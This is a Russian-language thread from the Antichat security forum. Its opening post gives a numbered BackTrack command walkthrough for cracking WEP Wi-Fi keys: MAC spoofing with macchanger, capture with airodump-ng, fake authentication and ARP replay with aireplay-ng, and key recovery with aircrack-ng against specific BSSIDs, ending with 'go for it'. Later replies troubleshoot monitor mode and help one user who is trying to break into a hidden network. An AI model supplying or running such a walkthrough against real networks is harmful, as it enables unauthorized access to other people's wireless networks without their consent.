ANTICHAT — форум по информационной безопасности, OSINT и технологиям

я ломаю WEP простым способом !

BT-3

1. #airmon-ng

2. #airmon-ng stop rausb0

{ rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon }

останавливаю Wi-fi карту для смены мак адреса .

3. # ifconfig rausb0 down

я пишу этот { 00:55:67:89:55:22 }

4. # macchanger --mac 00:55:67:89:55:22 rausb0

запускаем

5. # airmon-ng start rausb0

видим (monitor mode enabled on rausb0 )

Теперь сканим доступные беспроводные сети, использующие шфрование WEP


6 .# airodump-ng rausb0
остановить airodump клавишами Ctrl + С

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0

атакуем точку и комп

8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

запускаем дишифратор

9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

посе сбора 20 пакетов DATA запускаем aircrack

10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap

и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай !

удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS #

И ещо , купил адаптор USB WI-FI мощный , вот ссылка

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?

Да всё верно: -100 это п..дец как далеко
-0, 01 это п..дец как близко

boykent, а ты точно WEP ломаешь? Если там WPA/WPA2, то атака только по словарю

Здравствуйте!
Я владелец лэптопа Acer Extensa 5220 с wifi модулём Broadcom 4312 и WinXP SP3.
Как мне перевести wifi модуль в т.н. "monitor mode" и какой программой ловить пакеты, проходящие через сеть, к которой я подключен?

Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.

Чавойто Broadcom для мониторинга не пригоден-то, ась? Очень даже: airmon-ng start wlan0 и фперёд))

Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так;
BSSID 00:40:96:558:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.

Попробуй знаешь что, когда пускаешь aircrack-ng опцию -n поставь 64 бита (или 128, если ставишь 64). У мя такой косяк был
Вообще говоря, даже если ты пользуешся не BackTrck'ом вся проблема в длине взамываемого ключа - у тебя выбрана неверно.